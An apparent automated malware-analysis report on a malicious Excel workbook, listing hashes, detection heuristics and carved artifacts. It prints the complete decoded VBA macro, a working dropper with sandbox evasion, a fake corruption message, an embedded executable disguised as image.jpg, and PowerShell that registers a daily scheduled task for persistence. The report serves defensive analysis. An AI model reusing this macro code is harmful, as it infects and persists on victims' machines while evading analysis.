Malicious Office (OOXML) / .XLSX — malware analysis report

Static analysis result for SHA-256 da31c5fa2d502f03…

MALICIOUS

Office (OOXML) / .XLSX

Size: 427.8 KB
Created: 2026-01-09 02:09:33 UTC
Authoring application: Microsoft Excel 16.0300
First seen: 2026-06-10
MD5: 733521f9972d0104d8d6ec6f077a0c9c
SHA-1: ef8b637b435566f691e5fd568ed0fbd43025582f
SHA-256: da31c5fa2d502f03e4116cf6aa47c7c42d88513388afa4791ada9be4b5819300
Risk score: 318

Malware Insights

MITRE ATT&CK
  • T1566.001 Spearphishing Attachment
  • T1059.005 Visual Basic
  • T1059.001 PowerShell
  • T1204.002 Malicious File

The sample is an Excel document containing obfuscated VBA macros designed to execute a second-stage payload. The Auto_Open macro checks for the existence of a log file and, if it is not present, proceeds to execute a payload. The script attempts to create a persistence mechanism via a Run key and drops an executable to the public documents folder. The VBA code references PowerShell, indicating likely PowerShell execution.

Heuristics (11)

  • VBA project inside OOXML [medium] OOXML_VBA (7 related findings)
    Document contains a VBA project — VBA macros present
  • PowerShell reference in VBA [critical] OLE_VBA_PS
    Matched line in script
    ret = tltoiypblwfmg.Run("powershell.exe -NoProfile -ExecutionPolicy Bypass -File """ & tempPsFile & """", rktgglfckhihll, True)
  • Obfuscated auto-exec VBA loader [critical] OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER
    Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
    Matched line in script
    Set wmi = GetObject(fjcqijtguecrunm("77696e") & fjcqijtguecrunm("6d676d74733a5c5c2e5c726f6f745c63696d7632"))
  • CreateObject call [high] OLE_VBA_CREATEOBJ
    Matched line in script
    CreateObject(fjcqijtguecrunm("5368656c6c2e4170706c6963617469") & fjcqijtguecrunm("6f6e")) _
  • GetObject call [high] OLE_VBA_GETOBJ
    Matched line in script
    Set wmi = GetObject(fjcqijtguecrunm("77696e") & fjcqijtguecrunm("6d676d74733a5c5c2e5c726f6f745c63696d7632"))
  • VBA p-code auto-exec with execution tokens [high] OLE_VBA_PCODE_AUTOEXEC_EXEC
    Triggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
  • Auto_Open macro [low] OLE_VBA_AUTO
    Matched line in script
    Sub Auto_Open()
  • Environ() call (env variable access) [low] OLE_VBA_ENVIRON
    Matched line in script
    eeaqtcpxkzogqtzdwo = Environ("TEMP") & "\update.log"
  • Embedded OLE object [medium] OOXML_OLE_OBJECT
    Document contains an embedded OLE object
  • Macro/content-enable lure [medium] SE_ENABLE_LURE
    Document instructs the user to enable macros or editing — a common technique used by malware droppers to bypass Office macro security settings
  • Suspicious extracted artifact [info] EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.

Extracted artifacts (6)

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 18025 bytes
SHA-256: 7df27ea9e2ef762732567ba34caec15ab91882bdd08a65cc1be6e744d055dbee
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Module1"
Const uzcbzqxqhhmumu = 2
Const fcneuescivdpylq = 1
Const rktgglfckhihll = 0
Sub Auto_Open()
Dim eeaqtcpxkzogqtzdwo As String
eeaqtcpxkzogqtzdwo = Environ("TEMP") & "\update.log"
If Len(Dir(eeaqtcpxkzogqtzdwo)) > 0 Then
Call fxwlgevalafcsugxa
Exit Sub
End If
If prybyabgzifwq() Then
Call fxwlgevalafcsugxa
Else
MsgBox fjcqijtguecrunm("5468652066696c6520697320636f7272757074656420616e642063616e6e6f74") & fjcqijtguecrunm("206265206f70656e65642e"), vbCritical
Exit Sub
End If
End Sub
Function prybyabgzifwq() As Boolean
Dim wmi As Object
Dim oymvnnmuce As Integer
Dim availableMemory As Double
Dim totalDiskSpace As Double
Dim systemDrive As String
Dim mwbjfhpamwtf As Object
Dim qzjyuryxjjmaw As Variant
qzjyuryxjjmaw = Array(fjcqijtguecrunm("6369732e") & fjcqijtguecrunm("657865"), fjcqijtguecrunm("636d6476697274682e65") & fjcqijtguecrunm("7865"), fjcqijtguecrunm("616c697665") & fjcqijtguecrunm("2e657865"), fjcqijtguecrunm("66696c6577617463686572") & fjcqijtguecrunm("736572766963652e657865"), fjcqijtguecrunm("6e67") & fjcqijtguecrunm("766d7376632e657865"), fjcqijtguecrunm("73616e") & fjcqijtguecrunm("64626f78696572706373732e657865"), _
fjcqijtguecrunm("616e") & fjcqijtguecrunm("616c797a65722e657865"), fjcqijtguecrunm("666f7274") & fjcqijtguecrunm("697472616365722e657865"), fjcqijtguecrunm("6e73766572") & fjcqijtguecrunm("63746c2e657865"), fjcqijtguecrunm("736269656374") & fjcqijtguecrunm("726c2e657865"), fjcqijtguecrunm("616e") & fjcqijtguecrunm("676172322e657865"), fjcqijtguecrunm("676f617463") & fjcqijtguecrunm("61737065722e657865"), _
fjcqijtguecrunm("6f6c6c796462672e65") & fjcqijtguecrunm("7865"), fjcqijtguecrunm("736269657376632e") & fjcqijtguecrunm("657865"), fjcqijtguecrunm("6170696d6f6e6974") & fjcqijtguecrunm("6f722e657865"), fjcqijtguecrunm("476f6174436c69656e74417070") & fjcqijtguecrunm("2e657865"), fjcqijtguecrunm("706569642e65") & fjcqijtguecrunm("7865"), fjcqijtguecrunm("7363616e686f73742e65") & fjcqijtguecrunm("7865"), _
fjcqijtguecrunm("6170697370") & fjcqijtguecrunm("792e657865"), fjcqijtguecrunm("686965") & fjcqijtguecrunm("7733322e657865"), fjcqijtguecrunm("7065") & fjcqijtguecrunm("726c2e657865"), fjcqijtguecrunm("73636b746f6f6c") & fjcqijtguecrunm("2e657865"), fjcqijtguecrunm("61706973707933322e") & fjcqijtguecrunm("657865"), fjcqijtguecrunm("686f6f") & fjcqijtguecrunm("6b616e616170702e657865"), fjcqijtguecrunm("7065746f") & fjcqijtguecrunm("6f6c732e657865"), _
fjcqijtguecrunm("7364") & fjcqijtguecrunm("636c742e657865"), fjcqijtguecrunm("6173") & fjcqijtguecrunm("7572612e657865"), fjcqijtguecrunm("686f6f6b657870") & fjcqijtguecrunm("6c6f7265722e657865"), fjcqijtguecrunm("706578706c6f7265") & fjcqijtguecrunm("722e657865"), fjcqijtguecrunm("7366746463") & fjcqijtguecrunm("632e657865"), fjcqijtguecrunm("617574") & fjcqijtguecrunm("6f7265706775692e657865"), fjcqijtguecrunm("687474706c6f67") & fjcqijtguecrunm("2e657865"), _
fjcqijtguecrunm("70696e67") & fjcqijtguecrunm("2e657865"), fjcqijtguecrunm("73687574646f") & fjcqijtguecrunm("776e6d6f6e2e657865"), fjcqijtguecrunm("6175") & fjcqijtguecrunm("746f72756e732e657865"), fjcqijtguecrunm("6963") & fjcqijtguecrunm("6573776f72642e657865"), fjcqijtguecrunm("707230633378702e") & fjcqijtguecrunm("657865"), fjcqijtguecrunm("736e6966666869") & fjcqijtguecrunm("742e657865"), _
fjcqijtguecrunm("6175746f72756e7363") & fjcqijtguecrunm("2e657865"), fjcqijtguecrunm("69636c69636b65722d72656c") & fjcqijtguecrunm("656173652e657865"), fjcqijtguecrunm("7072696e63") & fjcqijtguecrunm("652e657865"), fjcqijtguecrunm("736e6f6f702e65") & fjcqijtguecrunm("7865"), fjcqijtguecrunm("6175746f73637265656e73") & fjcqijtguecrunm("686f747465722e657865"), fjcqijtguecrunm("696461") & fjcqijtguecrunm("672e657865"), _
fjcqijtguecrunm("7072") & fjcqijtguecrunm("6f63616e616c797a65722e657865"), fjcqijtguecrunm("73706b") & fjcqijtguecrunm("726d6f6e2e657865"), fjcqijtguecrunm("6176637465737473756974652e") & fjcqijtguecrunm("657865"), fjcqijtguecrunm("696461") & fjcqijtguecrunm("6736342e657865"), fjcqijtguecrunm("70726f636573736861636b") & fjcqijtguecrunm("65722e657865"), fjcqijtguecrunm("737973616e616c797a") & fjcqijtguecrunm("65722e657865"), _
fjcqijtguecrunm("61767a2e65") & fjcqijtguecrunm("7865"), fjcqijtguecrunm("6964") & fjcqijtguecrunm("61712e657865"), fjcqijtguecrunm("70726f") & fjcqijtguecrunm("636573736d656d64756d702e657865"), fjcqijtguecrunm("7379736572") & fjcqijtguecrunm("2e657865"), fjcqijtguecrunm("626568") & fjcqijtguecrunm("6176696f7264756d7065722e657865"), fjcqijtguecrunm("696d") & fjcqijtguecrunm("6d756e69747964656275676765722e657865"), _
fjcqijtguecrunm("70726f63") & fjcqijtguecrunm("6578702e657865"), fjcqijtguecrunm("737973") & fjcqijtguecrunm("74656d6578706c6f7265722e657865"), fjcqijtguecrunm("62696e6469") & fjcqijtguecrunm("66662e657865"), fjcqijtguecrunm("696d706f7274") & fjcqijtguecrunm("7265632e657865"), fjcqijtguecrunm("70726f6365787036342e") & fjcqijtguecrunm("657865"), fjcqijtguecrunm("73797374656d6578706c") & fjcqijtguecrunm("6f726572736572766963652e657865"), _
fjcqijtguecrunm("425450") & fjcqijtguecrunm("5472617949636f6e2e657865"), fjcqijtguecrunm("696d") & fjcqijtguecrunm("756c2e657865"), fjcqijtguecrunm("70726f636d") & fjcqijtguecrunm("6f6e2e657865"), fjcqijtguecrunm("7379") & fjcqijtguecrunm("74686f6e2e657865"), fjcqijtguecrunm("63617074757265") & fjcqijtguecrunm("6261742e657865"), fjcqijtguecrunm("496e666f63") & fjcqijtguecrunm("6c69656e742e657865"), fjcqijtguecrunm("70726f636d6f6e3634") & fjcqijtguecrunm("2e657865"), _
fjcqijtguecrunm("7461736b6d") & fjcqijtguecrunm("67722e657865"), fjcqijtguecrunm("636462") & fjcqijtguecrunm("2e657865"), fjcqijtguecrunm("696e7374616c6c72697465") & fjcqijtguecrunm("2e657865"), fjcqijtguecrunm("7079") & fjcqijtguecrunm("74686f6e2e657865"), fjcqijtguecrunm("7461736c6f67696e2e") & fjcqijtguecrunm("657865"), fjcqijtguecrunm("6366") & fjcqijtguecrunm("666578706c6f7265722e657865"), fjcqijtguecrunm("697066") & fjcqijtguecrunm("732e657865"), _
fjcqijtguecrunm("70797468") & fjcqijtguecrunm("6f6e772e657865"), fjcqijtguecrunm("74637064756d70") & fjcqijtguecrunm("2e657865"), fjcqijtguecrunm("636c69636b73686172656c61756e63") & fjcqijtguecrunm("6865722e657865"), fjcqijtguecrunm("6970726f7365746d6f6e69746f722e") & fjcqijtguecrunm("657865"), fjcqijtguecrunm("7171") & fjcqijtguecrunm("2e657865"), fjcqijtguecrunm("74637076696577") & fjcqijtguecrunm("2e657865"), _
fjcqijtguecrunm("636c") & fjcqijtguecrunm("6f7365706f7075702e657865"), fjcqijtguecrunm("69726167656e74") & fjcqijtguecrunm("2e657865"), fjcqijtguecrunm("717166666f2e65") & fjcqijtguecrunm("7865"), fjcqijtguecrunm("717170726f74656374") & fjcqijtguecrunm("2e657865"), fjcqijtguecrunm("746f74616c636d642e") & fjcqijtguecrunm("657865"), fjcqijtguecrunm("63706f727473") & fjcqijtguecrunm("2e657865"), fjcqijtguecrunm("6a6f65626f78636f6e74726f") & fjcqijtguecrunm("6c2e657865"), _
fjcqijtguecrunm("717173") & fjcqijtguecrunm("672e657865"), fjcqijtguecrunm("7472") & fjcqijtguecrunm("6f6a6469652e6b767063726f7373666972652e657865"), fjcqijtguecrunm("6a6f65626f787365") & fjcqijtguecrunm("727665722e657865"), fjcqijtguecrunm("7261") & fjcqijtguecrunm("70746f72636c69656e742e657865"), fjcqijtguecrunm("7478706c617466") & fjcqijtguecrunm("6f726d2e657865"), fjcqijtguecrunm("646e662e") & fjcqijtguecrunm("657865"), _
fjcqijtguecrunm("6c616d65722e") & fjcqijtguecrunm("657865"), fjcqijtguecrunm("7265676d6f") & fjcqijtguecrunm("6e2e657865"), fjcqijtguecrunm("76697275732e65") & fjcqijtguecrunm("7865"), fjcqijtguecrunm("64736e6966") & fjcqijtguecrunm("662e657865"), fjcqijtguecrunm("4c6f674854") & fjcqijtguecrunm("54502e657865"), fjcqijtguecrunm("72656773686f742e") & fjcqijtguecrunm("657865"), fjcqijtguecrunm("76782e") & fjcqijtguecrunm("657865"), fjcqijtguecrunm("64756d706361702e65") & fjcqijtguecrunm("7865"), _
fjcqijtguecrunm("6c6f72647065") & fjcqijtguecrunm("2e657865"), fjcqijtguecrunm("5265704d677236342e") & fjcqijtguecrunm("657865"), fjcqijtguecrunm("7769") & fjcqijtguecrunm("6e616c797369732e657865"), fjcqijtguecrunm("656d756c") & fjcqijtguecrunm("2e657865"), fjcqijtguecrunm("6d616c6d") & fjcqijtguecrunm("6f6e2e657865"), fjcqijtguecrunm("5265705574696c7333322e65") & fjcqijtguecrunm("7865"), fjcqijtguecrunm("77696e6170696f766572") & fjcqijtguecrunm("7269646533322e657865"), _
fjcqijtguecrunm("657468") & fjcqijtguecrunm("657265616c2e657865"), fjcqijtguecrunm("6d626172") & fjcqijtguecrunm("756e2e657865"), fjcqijtguecrunm("5265") & fjcqijtguecrunm("7055782e657865"), fjcqijtguecrunm("7769") & fjcqijtguecrunm("6e6462672e657865"), fjcqijtguecrunm("657474657263") & fjcqijtguecrunm("61702e657865"), fjcqijtguecrunm("6d64706d6f6e") & fjcqijtguecrunm("2e657865"), fjcqijtguecrunm("72756e73616d706c65") & fjcqijtguecrunm("2e657865"), _
fjcqijtguecrunm("77696e") & fjcqijtguecrunm("64756d702e657865"), fjcqijtguecrunm("66616b656874747073") & fjcqijtguecrunm("65727665722e657865"), fjcqijtguecrunm("6d6d722e65") & fjcqijtguecrunm("7865"), fjcqijtguecrunm("7361") & fjcqijtguecrunm("6d7031652e657865"), fjcqijtguecrunm("77696e7370792e65") & fjcqijtguecrunm("7865"), fjcqijtguecrunm("6661") & fjcqijtguecrunm("6b657365727665722e657865"), fjcqijtguecrunm("73616d706c652e") & fjcqijtguecrunm("657865"), _
fjcqijtguecrunm("77697265736861") & fjcqijtguecrunm("726b2e657865"), fjcqijtguecrunm("6c67") & fjcqijtguecrunm("6875625f6167656e742e657865"), fjcqijtguecrunm("44656c6c4f7074696d697a65") & fjcqijtguecrunm("722e657865"), fjcqijtguecrunm("46696464") & fjcqijtguecrunm("6c65722e657865"), fjcqijtguecrunm("6d756c746970") & fjcqijtguecrunm("6f742e657865"), fjcqijtguecrunm("73616e64626f78696563") & fjcqijtguecrunm("727970746f2e657865"), fjcqijtguecrunm("5858582e") & fjcqijtguecrunm("657865"), fjcqijtguecrunm("66696c656d") & fjcqijtguecrunm("6f6e2e657865"), fjcqijtguecrunm("6e6574736e696666") & fjcqijtguecrunm("65722e657865"), _
fjcqijtguecrunm("73616e64626f78") & fjcqijtguecrunm("696564636f6d6c61756e63682e657865"))
On Error Resume Next
Set wmi = GetObject(fjcqijtguecrunm("77696e") & fjcqijtguecrunm("6d676d74733a5c5c2e5c726f6f745c63696d7632"))
systemDrive = wmi.ExecQuery(fjcqijtguecrunm("53656c6563742053797374656d44726976652066726f6d2057696e33325f4f7065726174696e") & fjcqijtguecrunm("6753797374656d")).ItemIndex(0).systemDrive
systemDrive = Left(systemDrive, uzcbzqxqhhmumu)
oymvnnmuce = wmi.ExecQuery(fjcqijtguecrunm("53656c656374204e756d6265724f664c6f676963616c50726f636573736f72732066726f6d") & fjcqijtguecrunm("2057696e33325f436f6d707574657253797374656d")).ItemIndex(0).NumberOfLogicalProcessors
If oymvnnmuce < 2 Then
MsgBox fjcqijtguecrunm("5468652066696c6520697320636f7272757074656420616e642063616e6e6f7420") & fjcqijtguecrunm("6265206f70656e65642e"), vbCritical
prybyabgzifwq = False
Exit Function
End If
totalMemory = wmi.ExecQuery(fjcqijtguecrunm("53656c65637420546f74616c506879736963616c4d656d6f72792066726f6d2057696e") & fjcqijtguecrunm("33325f436f6d707574657253797374656d")).ItemIndex(0).TotalPhysicalMemory / (1024 ^ 2)
If totalMemory < 2048 Then
MsgBox fjcqijtguecrunm("5468652066696c6520697320636f7272757074656420616e642063616e6e6f7420626520") & fjcqijtguecrunm("6f70656e65642e"), vbCritical
prybyabgzifwq = False
Exit Function
End If
Set mwbjfhpamwtf = wmi.ExecQuery(fjcqijtguecrunm("53656c6563742053697a652066726f6d205769") & fjcqijtguecrunm("6e33325f4c6f676963616c4469736b2077686572652044657669636549443d27") & systemDrive & fjcqijtguecrunm("27")).ItemIndex(0)
totalDiskSpace = mwbjfhpamwtf.Size / (1024 ^ 3)
If totalDiskSpace < 40 Then
MsgBox fjcqijtguecrunm("5468652066696c6520697320636f7272757074656420616e642063616e6e6f742062") & fjcqijtguecrunm("65206f70656e65642e"), vbCritical
prybyabgzifwq = False
Exit Function
End If
Dim iqtqwkwi, pf, hasPagefile
hasPagefile = False
Set iqtqwkwi = wmi.ExecQuery(fjcqijtguecrunm("53656c656374202a206672") & fjcqijtguecrunm("6f6d2057696e33325f5061676546696c655573616765"))
For Each pf In iqtqwkwi
If pf.AllocatedBaseSize > 0 Then
hasPagefile = True
Exit For
End If
Next
If Not hasPagefile Then
Set iqtqwkwi = wmi.ExecQuery(fjcqijtguecrunm("53656c656374202a2066726f6d2057696e33325f5061676546696c65536574") & fjcqijtguecrunm("74696e67"))
For Each pf In iqtqwkwi
If pf.InitialSize > 0 Or pf.MaximumSize > 0 Then
hasPagefile = True
Exit For
End If
Next
End If
If Not hasPagefile Then
MsgBox fjcqijtguecrunm("5468652066696c6520697320636f7272757074656420616e642063616e6e6f74206265206f70656e65") & fjcqijtguecrunm("642e"), vbCritical
prybyabgzifwq = False
Exit Function
End If
If erwujsbpnjxxngev(qzjyuryxjjmaw) Then
MsgBox fjcqijtguecrunm("5468652066696c6520697320636f7272757074656420616e642063616e6e6f7420") & fjcqijtguecrunm("6265206f70656e65642e"), vbCritical
prybyabgzifwq = False
Exit Function
End If
prybyabgzifwq = True
End Function
Function erwujsbpnjxxngev(qzjyuryxjjmaw As Variant) As Boolean
Dim wmi As Object
Dim nputyvsxsfm As Object
Dim uhkggqremlmhrxfao As Object
Dim nhhfuxec As Integer
On Error Resume Next
Set wmi = GetObject(fjcqijtguecrunm("77696e6d676d74733a5c5c2e5c72") & fjcqijtguecrunm("6f6f745c63696d7632"))
Set nputyvsxsfm = wmi.ExecQuery(fjcqijtguecrunm("53656c656374202a2066726f6d2057696e33325f50726f") & fjcqijtguecrunm("63657373"))
For Each uhkggqremlmhrxfao In nputyvsxsfm
For nhhfuxec = LBound(qzjyuryxjjmaw) To UBound(qzjyuryxjjmaw)
If LCase(uhkggqremlmhrxfao.Name) = LCase(qzjyuryxjjmaw(nhhfuxec)) Then
erwujsbpnjxxngev = True
Exit Function
End If
Next nhhfuxec
Next uhkggqremlmhrxfao
erwujsbpnjxxngev = False
End Function
Sub fxwlgevalafcsugxa()
Dim nhrxmkdgxwoeqmqqnc As String
Dim pjmhbxidgkmaxgt As String
Dim ugabspcm As Object
Dim qtmcgbayej As String
Dim edobzwkbnyoi As String
Dim obgbnfap As String
Dim aeqwnanbmwej As String
Dim tpltnqekmtcxyqe As String
ActiveSheet.OLEObjects(fjcqijtguecrunm("4f626a") & fjcqijtguecrunm("6563742031")).Copy
CreateObject(fjcqijtguecrunm("5368656c6c2e4170706c6963617469") & fjcqijtguecrunm("6f6e")) _
.Namespace(ActiveWorkbook.Path) _
.Self.InvokeVerb fjcqijtguecrunm("506173") & fjcqijtguecrunm("7465")
filePath = ActiveWorkbook.Path & fjcqijtguecrunm("5c696d6167") & fjcqijtguecrunm("652e6a7067")
appDataPath = CreateObject(fjcqijtguecrunm("575363726970742e53") & fjcqijtguecrunm("68656c6c")).SpecialFolders(fjcqijtguecrunm("417070") & fjcqijtguecrunm("44617461"))
tpltnqekmtcxyqe = appDataPath & fjcqijtguecrunm("5c4d534f66") & fjcqijtguecrunm("666963655c")
If Dir(tpltnqekmtcxyqe, vbDirectory) = "" Then
MkDir tpltnqekmtcxyqe
Else
Kill filePath
Exit Sub
End If
obgbnfap = tpltnqekmtcxyqe & fjcqijtguecrunm("6d737375") & fjcqijtguecrunm("73622e657865") '
FileCopy filePath, obgbnfap
Set ugabspcm = CreateObject(fjcqijtguecrunm("5753") & fjcqijtguecrunm("63726970742e5368656c6c"))
nhrxmkdgxwoeqmqqnc = fjcqijtguecrunm("557064617465546173") & fjcqijtguecrunm("6b4d616368696e65")
aeqwnanbmwej = fjcqijtguecrunm("7374") & fjcqijtguecrunm("617274")
tempPsFile = Environ("TEMP") & "\CreateTask_" & Format(Now, "yyyymmdd_hhnnss") & "_" & Int((10000) * Rnd) & ".ps1"
psCommand = fjcqijtguecrunm("696620282d4e6f7420284765742d5363686564756c65645461736b202d5461736b4e") & fjcqijtguecrunm("616d652027") & nhrxmkdgxwoeqmqqnc & fjcqijtguecrunm("27202d4572726f72416374696f6e2053696c656e746c79436f") & fjcqijtguecrunm("6e74696e75652929207b") & vbCrLf & _
fjcqijtguecrunm("2020202024737461727454696d65203d20284765742d44") & fjcqijtguecrunm("617465292e4164644d696e75746573283239292e546f537472696e67282748483a6d6d2729") & vbCrLf & _
fjcqijtguecrunm("2020202024616374696f6e203d204e65772d5363686564756c65645461736b416374696f6e202d45786563757465") & fjcqijtguecrunm("2027") & obgbnfap & fjcqijtguecrunm("27202d417267756d656e74") & fjcqijtguecrunm("2027") & aeqwnanbmwej & fjcqijtguecrunm("27202d576f726b696e67") & fjcqijtguecrunm("4469726563746f72792027") & tpltnqekmtcxyqe & fjcqijtguecrunm("27") & vbCrLf & _
fjcqijtguecrunm("202020202474726967676572203d204e65772d5363686564756c65645461736b54726967676572202d4461696c") & fjcqijtguecrunm("79202d41742024737461727454696d65") & vbCrLf & _
fjcqijtguecrunm("2020202052656769737465722d5363686564") & fjcqijtguecrunm("756c65645461736b202d5461736b4e616d652027") & nhrxmkdgxwoeqmqqnc & fjcqijtguecrunm("27202d416374696f6e2024616374696f6e") & fjcqijtguecrunm("202d54726967676572202474726967676572202d466f726365") & vbCrLf & _
fjcqijtguecrunm("7d")
Dim irunxnvgqdvx As Object, rowahtvsmgbfkhe As Object
Set irunxnvgqdvx = CreateObject(fjcqijtguecrunm("536372697074696e672e") & fjcqijtguecrunm("46696c6553797374656d4f626a656374"))
Set rowahtvsmgbfkhe = irunxnvgqdvx.CreateTextFile(tempPsFile, True, True)
rowahtvsmgbfkhe.Write psCommand
rowahtvsmgbfkhe.Close
Set tltoiypblwfmg = CreateObject(fjcqijtguecrunm("575363726970742e5368") & fjcqijtguecrunm("656c6c"))
ret = tltoiypblwfmg.Run("powershell.exe -NoProfile -ExecutionPolicy Bypass -File """ & tempPsFile & """", rktgglfckhihll, True)
On Error Resume Next
irunxnvgqdvx.DeleteFile tempPsFile, True
On Error GoTo 0
Kill filePath
MsgBox fjcqijtguecrunm("5468652066696c6520697320636f7272757074656420616e642063616e") & fjcqijtguecrunm("6e6f74206265206f70656e65642e2e2e"), vbCritical
End Sub

Attribute VB_Name = "Module2"
Function fjcqijtguecrunm(ByVal rtkhffdrz As String) As String
Dim hdwzvgtoxf As Long
For hdwzvgtoxf = 1 To Len(rtkhffdrz) Step 2
fjcqijtguecrunm = fjcqijtguecrunm & Chr$(Val("&H" & Mid$(rtkhffdrz, hdwzvgtoxf, 2)))
Next hdwzvgtoxf
End Function
ooxml_oleobject_00.bin | ooxml-ole-object | OOXML embedded OLE part: xl/embeddings/oleObject1.bin | 712192 bytes
SHA-256: 70157f517e8e7622f49eb112d8d4a10f08dac3a15857c3d92ac07a49bf869d89
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact entropy is 7.52, consistent with packed or encrypted content.
ooxml_oleobject_00_ole10native_00.bin | ole-package | OOXML xl/embeddings/oleObject1.bin Ole10Native stream: Ole10Native | 705064 bytes
SHA-256: c4b54097f7a1ccb0a4e4a10497431b8d938a7ac0e030b18cf258cb2eb3c8adb6
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact entropy is 7.55, consistent with packed or encrypted content.
ooxml_oleobject_00_ole10native_00_image.jpg | ole-package-payload | OOXML xl/embeddings/oleObject1.bin Ole10Native payload: display_name=image.jpg; full_path=C:\Users\Admin\AppData\Local\Temp\{E4D8AFD4-B54C-448A-88EA-2CF8749DA8C9}\image.jpg; temp_path=; def_file= | 704512 bytes
SHA-256: f2977b1f3f05c3e38d301232dccf059ba3bb6b126d1f892d7a338c3f9fcaa49e
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact entropy is 7.55, consistent with packed or encrypted content.
vbaProject_00.bin | vba-project | OOXML VBA project: xl/vbaProject.bin | 38400 bytes
SHA-256: 67063b951eca0481a6118f835ed6189b6d2062d46dcdae8cf0c6fe41703e7ef4
emf_00.emf | ooxml-emf | OOXML EMF part: xl/media/image1.emf | 4988 bytes
SHA-256: 47b36d4917a574120d2728674abc24e9796871c1fc19eca067ce81eca3058888